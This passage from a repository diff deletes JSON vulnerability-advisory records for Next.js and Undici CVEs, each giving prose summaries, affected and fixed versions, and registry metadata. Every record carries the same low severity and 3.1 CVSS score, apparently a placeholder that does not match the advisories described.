"15.4.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

76
08-threat-intel/registry/advisories/nextjs--CVE-2025-57822.json
查看文件

@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-57822",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Improper Middleware Redirect Handling Leads to SSRF",
"summary": "A vulnerability in **Next.js Middleware** has been fixed in **v14.2.32** and **v15.4.7**. The issue occurred when request headers were directly passed into `NextResponse.next()`. In self-hosted applications, this could allow Server-Side Request Forgery (SSRF) if certain sensitive headers from the incoming request were reflected back into the response.\n\nAll users implementing custom middleware logic in self-hosted environments are strongly encouraged to upgrade and verify correct usage of the `next()` function.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57822)",
"published_at": "2025-08-29T21:33:09Z",
"updated_at": "2026-02-04T04:20:45.658010Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-4342-x723-ch2f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57822",
"https://github.com/vercel/next.js/commit/9c9aaed5bb9338ef31b0517ccf0ab4414f2093d8",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57822"
],
"aliases": [
"CVE-2025-57822",
"GHSA-4342-x723-ch2f"
],
"cve_ids": [
"CVE-2025-57822"
],
"ghsa_ids": [
"GHSA-4342-x723-ch2f"
],
"osv_ids": [
"GHSA-4342-x723-ch2f"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.32",
"introduced=15.0.0-canary.0, fixed<15.4.7"
],
"fixed_versions": [
"14.2.32",
"15.4.7"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"ssrf-url-validation"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

77
08-threat-intel/registry/advisories/nextjs--CVE-2025-59471.json
查看文件

@@ -1,77 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-59471",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration",
"summary": "A DoS vulnerability exists in self-hosted Next.js applications that have `remotePatterns` configured for the Image Optimizer. The image optimization endpoint (`/_next/image`) loads external images entirely into memory without enforcing a maximum size limit, allowing an attacker to cause out-of-memory conditions by requesting optimization of arbitrarily large images. This vulnerability requires that `remotePatterns` is configured to allow image optimization from external domains and that the attacker can serve or control a large image on an allowed domain.\n\nStrongly consider upgrading to 15.5.10 and 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"published_at": "2026-01-27T19:18:25Z",
"updated_at": "2026-02-10T01:28:46.973023Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-9g9p-9gw9-jx7f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59471",
"https://github.com/vercel/next.js/commit/500ec83743639addceaede95e95913398975156c",
"https://github.com/vercel/next.js/commit/e5b834d208fe0edf64aa26b5d76dcf6a176500ec",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.5.10",
"https://github.com/vercel/next.js/releases/tag/v16.1.5"
],
"aliases": [
"CVE-2025-59471",
"GHSA-9g9p-9gw9-jx7f"
],
"cve_ids": [
"CVE-2025-59471"
],
"ghsa_ids": [
"GHSA-9g9p-9gw9-jx7f"
],
"osv_ids": [
"GHSA-9g9p-9gw9-jx7f"
],
"affected_versions": [
"introduced=10.0.0, fixed<15.5.10",
"introduced=15.6.0-canary.0, fixed<16.1.5"
],
"fixed_versions": [
"15.5.10",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

74
08-threat-intel/registry/advisories/nextjs--CVE-2025-59472.json
查看文件

@@ -1,74 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-59472",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js has Unbounded Memory Consumption via PPR Resume Endpoint ",
"summary": "A denial of service vulnerability exists in Next.js versions with Partial Prerendering (PPR) enabled when running in minimal mode. The PPR resume endpoint accepts unauthenticated POST requests with the `Next-Resume: 1` header and processes attacker-controlled postponed state data. Two closely related vulnerabilities allow an attacker to crash the server process through memory exhaustion:\n\n1. **Unbounded request body buffering**: The server buffers the entire POST request body into memory using `Buffer.concat()` without enforcing any size limit, allowing arbitrarily large payloads to exhaust available memory.\n\n2. **Unbounded decompression (zipbomb)**: The resume data cache is decompressed using `inflateSync()` without limiting the decompressed output size. A small compressed payload can expand to hundreds of megabytes or gigabytes, causing memory exhaustion.\n\nBoth attack vectors result in a fatal V8 out-of-memory error (`FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory`) causing the Node.js process to terminate. The zipbomb variant is particularly dangerous as it can bypass reverse proxy request size limits while still causing large memory allocation on the server.\n\nTo be affected, an application must run with `experimental.ppr: true` or `cacheComponents: true` configured along with the NEXT_PRIVATE_MINIMAL_MODE=1 environment variable.\n\nStrongly consider upgrading to 15.6.0-canary.61 or 16.1.5 to reduce risk and prevent availability issues in Next applications.",
"published_at": "2026-01-28T15:20:55Z",
"updated_at": "2026-02-06T13:13:43.709252Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5f7q-jpqc-wp7h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-59472",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summaries-of-cve-2025-59471-and-cve-2025-59472"
],
"aliases": [
"CVE-2025-59472",
"GHSA-5f7q-jpqc-wp7h"
],
"cve_ids": [
"CVE-2025-59472"
],
"ghsa_ids": [
"GHSA-5f7q-jpqc-wp7h"
],
"osv_ids": [
"GHSA-5f7q-jpqc-wp7h"
],
"affected_versions": [
"introduced=15.0.0-canary.0, fixed<15.6.0-canary.61",
"introduced=16.0.0-beta.0, fixed<16.1.5"
],
"fixed_versions": [
"15.6.0-canary.61",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

90
08-threat-intel/registry/advisories/nextjs--GHSA-5j59-xgg2-r9c4.json
查看文件

@@ -1,90 +0,0 @@
{
"canonical_id": "nextjs--GHSA-5j59-xgg2-r9c4",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up",
"summary": "It was discovered that the fix for [CVE-2025-55184](https://github.com/advisories/GHSA-2m3v-v2m8-q956) in React Server Components was incomplete and did not fully mitigate denial-of-service conditions across all payload types. As a result, certain crafted inputs could still trigger excessive resource consumption. \n\nThis vulnerability affects React versions 19.0.2, 19.1.3, and 19.2.2, as well as frameworks that bundle or depend on these versions, including Next.js 13.x, 14.x, 15.x, and 16.x when using the App Router. The issue is tracked upstream as [CVE-2025-67779](https://www.cve.org/CVERecord?id=CVE-2025-67779).\n\nA malicious actor can send a specially crafted HTTP request to a Server Function endpoint that, when deserialized, causes the React Server Components runtime to enter an infinite loop. This can lead to sustained CPU consumption and cause the affected server process to become unresponsive, resulting in a denial-of-service condition in unpatched environments.",
"published_at": "2025-12-12T17:21:57Z",
"updated_at": "2026-02-04T02:46:38.768104Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-5j59-xgg2-r9c4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-67779",
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components",
"https://www.cve.org/CVERecord?id=CVE-2025-55184",
"https://www.facebook.com/security/advisories/cve-2025-67779"
],
"aliases": [
"GHSA-5j59-xgg2-r9c4"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-5j59-xgg2-r9c4"
],
"osv_ids": [
"GHSA-5j59-xgg2-r9c4"
],
"affected_versions": [
"introduced=13.3.1-canary.0, fixed<14.2.35",
"introduced=15.0.6, fixed<15.0.7",
"introduced=15.1.10, fixed<15.1.11",
"introduced=15.2.7, fixed<15.2.8",
"introduced=15.3.7, fixed<15.3.8",
"introduced=15.4.9, fixed<15.4.10",
"introduced=15.5.8, fixed<15.5.9",
"introduced=15.6.0-canary.59, fixed<15.6.0-canary.60",
"introduced=16.0.9, fixed<16.0.10",
"introduced=16.1.0-canary.17, fixed<16.1.0-canary.19"
],
"fixed_versions": [
"14.2.35",
"15.0.7",
"15.1.11",
"15.2.8",
"15.3.8",
"15.4.10",
"15.5.9",
"15.6.0-canary.60",
"16.0.10",
"16.1.0-canary.19"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

83
08-threat-intel/registry/advisories/nextjs--GHSA-9qr9-h5gf-34mp.json
查看文件

@@ -1,83 +0,0 @@
{
"canonical_id": "nextjs--GHSA-9qr9-h5gf-34mp",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js is vulnerable to RCE in React flight protocol",
"summary": "A vulnerability affects certain React packages<sup>1</sup> for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55182](https://www.cve.org/CVERecord?id=CVE-2025-55182). \n\nFixed in:\nReact: 19.0.1, 19.1.2, 19.2.1\nNext.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7, 15.6.0-canary.58, 16.1.0-canary.12+\n\nThe vulnerability also affects experimental canary releases starting with 14.3.0-canary.77. Users on any of the 14.3 canary builds should either downgrade to a 14.x stable release or 14.3.0-canary.76.\n\nAll users of stable 15.x or 16.x Next.js versions should upgrade to a patched, stable version immediately.\n\n<sup>1</sup> The affected React packages are:\n- react-server-dom-parcel\n- react-server-dom-turbopack\n- react-server-dom-webpack",
"published_at": "2025-12-03T19:07:11Z",
"updated_at": "2026-02-04T03:45:15.823345Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp",
"https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-fmh4-wr37-44fp",
"https://nvd.nist.gov/vuln/detail/CVE-2025-55182",
"https://github.com/vercel/next.js"
],
"aliases": [
"GHSA-9qr9-h5gf-34mp"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-9qr9-h5gf-34mp"
],
"osv_ids": [
"GHSA-9qr9-h5gf-34mp"
],
"affected_versions": [
"introduced=14.3.0-canary.77, fixed<15.0.5",
"introduced=15.1.0-canary.0, fixed<15.1.9",
"introduced=15.2.0-canary.0, fixed<15.2.6",
"introduced=15.3.0-canary.0, fixed<15.3.6",
"introduced=15.4.0-canary.0, fixed<15.4.8",
"introduced=15.5.0-canary.0, fixed<15.5.7",
"introduced=16.0.0-canary.0, fixed<16.0.7"
],
"fixed_versions": [
"15.0.5",
"15.1.9",
"15.2.6",
"15.3.6",
"15.4.8",
"15.5.7",
"16.0.7"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

88
08-threat-intel/registry/advisories/nextjs--GHSA-h25m-26qc-wcjf.json
查看文件

@@ -1,88 +0,0 @@
{
"canonical_id": "nextjs--GHSA-h25m-26qc-wcjf",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components",
"summary": "A vulnerability affects certain React Server Components packages for versions 19.0.x, 19.1.x, and 19.2.x and frameworks that use the affected packages, including Next.js 13.x, 14.x, 15.x, and 16.x using the App Router. The issue is tracked upstream as [CVE-2026-23864](https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg).\n\nA specially crafted HTTP request can be sent to any App Router Server Function endpoint that, when deserialized, may trigger excessive CPU usage, out-of-memory exceptions, or server crashes. This can result in denial of service in unpatched environments.",
"published_at": "2026-01-28T15:38:01Z",
"updated_at": "2026-02-13T00:43:52.836085Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/facebook/react/security/advisories/GHSA-83fc-fqcc-2hmg",
"secondary_source_urls": [
"https://github.com/vercel/next.js/security/advisories/GHSA-h25m-26qc-wcjf",
"https://nvd.nist.gov/vuln/detail/CVE-2026-23864",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/summary-of-cve-2026-23864"
],
"aliases": [
"GHSA-h25m-26qc-wcjf"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-h25m-26qc-wcjf"
],
"osv_ids": [
"GHSA-h25m-26qc-wcjf"
],
"affected_versions": [
"introduced=13.0.0, fixed<15.0.8",
"introduced=15.1.1-canary.0, fixed<15.1.12",
"introduced=15.2.0-canary.0, fixed<15.2.9",
"introduced=15.3.0-canary.0, fixed<15.3.9",
"introduced=15.4.0-canary.0, fixed<15.4.11",
"introduced=15.5.1-canary.0, fixed<15.5.10",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.61",
"introduced=16.0.0-beta.0, fixed<16.0.11",
"introduced=16.1.0-canary.0, fixed<16.1.5"
],
"fixed_versions": [
"15.0.8",
"15.1.12",
"15.2.9",
"15.3.9",
"15.4.11",
"15.5.10",
"15.6.0-canary.61",
"16.0.11",
"16.1.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy",
"deserialization-safety"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "deserialization-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

88
08-threat-intel/registry/advisories/nextjs--GHSA-mwv6-3258-q52c.json
查看文件

@@ -1,88 +0,0 @@
{
"canonical_id": "nextjs--GHSA-mwv6-3258-q52c",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next Vulnerable to Denial of Service with Server Components",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55184](https://www.cve.org/CVERecord?id=CVE-2025-55184).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that, when deserialized, can cause the server process to hang and consume CPU. This can result in denial of service in unpatched environments.",
"published_at": "2025-12-11T22:49:27Z",
"updated_at": "2026-02-04T03:55:54.855562Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-mwv6-3258-q52c",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55184"
],
"aliases": [
"GHSA-mwv6-3258-q52c"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-mwv6-3258-q52c"
],
"osv_ids": [
"GHSA-mwv6-3258-q52c"
],
"affected_versions": [
"introduced=13.3.0, fixed<14.2.34",
"introduced=15.0.0-canary.0, fixed<15.0.6",
"introduced=15.1.1-canary.0, fixed<15.1.10",
"introduced=15.2.0-canary.0, fixed<15.2.7",
"introduced=15.3.0-canary.0, fixed<15.3.7",
"introduced=15.4.0-canary.0, fixed<15.4.9",
"introduced=15.5.1-canary.0, fixed<15.5.8",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
"introduced=16.0.0-beta.0, fixed<16.0.9",
"introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
],
"fixed_versions": [
"14.2.34",
"15.0.6",
"15.1.10",
"15.2.7",
"15.3.7",
"15.4.9",
"15.5.8",
"15.6.0-canary.59",
"16.0.9",
"16.1.0-canary.17"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

86
08-threat-intel/registry/advisories/nextjs--GHSA-w37m-7fhw-fmv9.json
查看文件

@@ -1,86 +0,0 @@
{
"canonical_id": "nextjs--GHSA-w37m-7fhw-fmv9",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next Server Actions Source Code Exposure ",
"summary": "A vulnerability affects certain React packages for versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0, and 19.2.1 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router. The issue is tracked upstream as [CVE-2025-55183](https://www.cve.org/CVERecord?id=CVE-2025-55183).\n\nA malicious HTTP request can be crafted and sent to any App Router endpoint that can return the compiled source code of [Server Functions](https://react.dev/reference/rsc/server-functions). This could reveal business logic, but would not expose secrets unless they were hardcoded directly into [Server Function](https://react.dev/reference/rsc/server-functions) code.",
"published_at": "2025-12-11T22:49:56Z",
"updated_at": "2026-02-04T02:51:40.627151Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-w37m-7fhw-fmv9",
"secondary_source_urls": [
"https://github.com/vercel/next.js",
"https://nextjs.org/blog/security-update-2025-12-11",
"https://www.cve.org/CVERecord?id=CVE-2025-55183"
],
"aliases": [
"GHSA-w37m-7fhw-fmv9"
],
"cve_ids": [],
"ghsa_ids": [
"GHSA-w37m-7fhw-fmv9"
],
"osv_ids": [
"GHSA-w37m-7fhw-fmv9"
],
"affected_versions": [
"introduced=15.0.0-canary.0, fixed<15.0.6",
"introduced=15.1.1-canary.0, fixed<15.1.10",
"introduced=15.2.0-canary.0, fixed<15.2.7",
"introduced=15.3.0-canary.0, fixed<15.3.7",
"introduced=15.4.0-canary.0, fixed<15.4.9",
"introduced=15.5.1-canary.0, fixed<15.5.8",
"introduced=15.6.0-canary.0, fixed<15.6.0-canary.59",
"introduced=16.0.0-beta.0, fixed<16.0.9",
"introduced=16.1.0-canary.0, fixed<16.1.0-canary.17"
],
"fixed_versions": [
"15.0.6",
"15.1.10",
"15.2.7",
"15.3.7",
"15.4.9",
"15.5.8",
"15.6.0-canary.59",
"16.0.9",
"16.1.0-canary.17"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

79
08-threat-intel/registry/advisories/undici--CVE-2022-31151.json
查看文件

@@ -1,79 +0,0 @@
{
"canonical_id": "undici--CVE-2022-31151",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "undici before v5.8.0 vulnerable to uncleared cookies on cross-host / cross-origin redirect",
"summary": "### Impact\n\nAuthorization headers are already cleared on cross-origin redirect in\nhttps://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189, based on https://github.com/nodejs/undici/issues/872.\n\nHowever, cookie headers which are sensitive headers and are official headers found in the spec, remain uncleared. There also has been active discussion of implementing a cookie store https://github.com/nodejs/undici/pull/1441, which suggests that there are active users using cookie headers in undici.\nAs such this may lead to accidental leakage of cookie to a 3rd-party site or a malicious attacker who can control the redirection target (ie. an open redirector) to leak the cookie to the 3rd party site.\n\n### Patches\n\nThis was patched in v5.8.0.\n\n### Workarounds\n\nBy default, this vulnerability is not exploitable.\nDo not enable redirections, i.e. `maxRedirections: 0` (the default). \n\n### References\n\nhttps://hackerone.com/reports/1635514\nhttps://curl.se/docs/CVE-2018-1000007.html\nhttps://curl.se/docs/CVE-2022-27776.html\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [undici repository](https://github.com/nodejs/undici/issues)\n* To make a report, follow the [SECURITY](https://github.com/nodejs/node/blob/HEAD/SECURITY.md) document\n",
"published_at": "2022-07-21T20:31:05Z",
"updated_at": "2026-02-04T03:02:08.652391Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-q768-x9m6-m9qp",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-31151",
"https://github.com/nodejs/undici/issues/872",
"https://github.com/nodejs/undici/pull/1441",
"https://github.com/nodejs/undici/commit/0a5bee9465e627be36bac88edf7d9bbc9626126d",
"https://hackerone.com/reports/1635514",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/main/lib/handler/redirect.js#L189",
"https://github.com/nodejs/undici/releases/tag/v5.8.0",
"https://security.netapp.com/advisory/ntap-20220909-0006"
],
"aliases": [
"CVE-2022-31151",
"GHSA-q768-x9m6-m9qp"
],
"cve_ids": [
"CVE-2022-31151"
],
"ghsa_ids": [
"GHSA-q768-x9m6-m9qp"
],
"osv_ids": [
"GHSA-q768-x9m6-m9qp"
],
"affected_versions": [
"introduced=0, fixed<5.8.0"
],
"fixed_versions": [
"5.8.0"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-31151.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}

71
08-threat-intel/registry/advisories/undici--CVE-2022-32210.json
查看文件

@@ -1,71 +0,0 @@
{
"canonical_id": "undici--CVE-2022-32210",
"system_id": "undici",
"display_name": "Undici",
"category": "frameworks",
"advisory_mode": "core",
"title": "ProxyAgent vulnerable to MITM",
"summary": "### Description\n\n`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.\n\n### Impact\n\nThis affects all use of HTTPS via HTTP proxy using **`Undici.ProxyAgent`** with Undici or Node's global `fetch`. In this case, it removes all HTTPS security from all requests sent using Undici's `ProxyAgent`, allowing trivial MitM attacks by anybody on the network path between the client and the target server (local network users, your ISP, the proxy, the target server's ISP, etc).\nThis less seriously affects HTTPS via HTTPS proxies. When you send HTTPS via a proxy to a remote server, the proxy can freely view or modify all HTTPS traffic unexpectedly (but only the proxy). \n\n### Patches\n\nThis issue was patched in Undici v5.5.1.\n\n### Workarounds\n\nAt the time of writing, the only workaround is to not use `ProxyAgent` as a dispatcher for TLS Connections.",
"published_at": "2022-06-17T01:02:29Z",
"updated_at": "2026-03-13T22:15:23.541247Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-pgw7-wx7w-2w33",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-32210",
"https://hackerone.com/reports/1583680",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2022-32210",
"GHSA-pgw7-wx7w-2w33"
],
"cve_ids": [
"CVE-2022-32210"
],
"ghsa_ids": [
"GHSA-pgw7-wx7w-2w33"
],
"osv_ids": [
"GHSA-pgw7-wx7w-2w33"
],
"affected_versions": [
"introduced=4.8.2, fixed<5.5.1"
],
"fixed_versions": [
"5.5.1"
],
"package_name": "undici",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/undici/cases/undici-cve-2022-32210.md",
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Undici"
],
"source_kinds": [
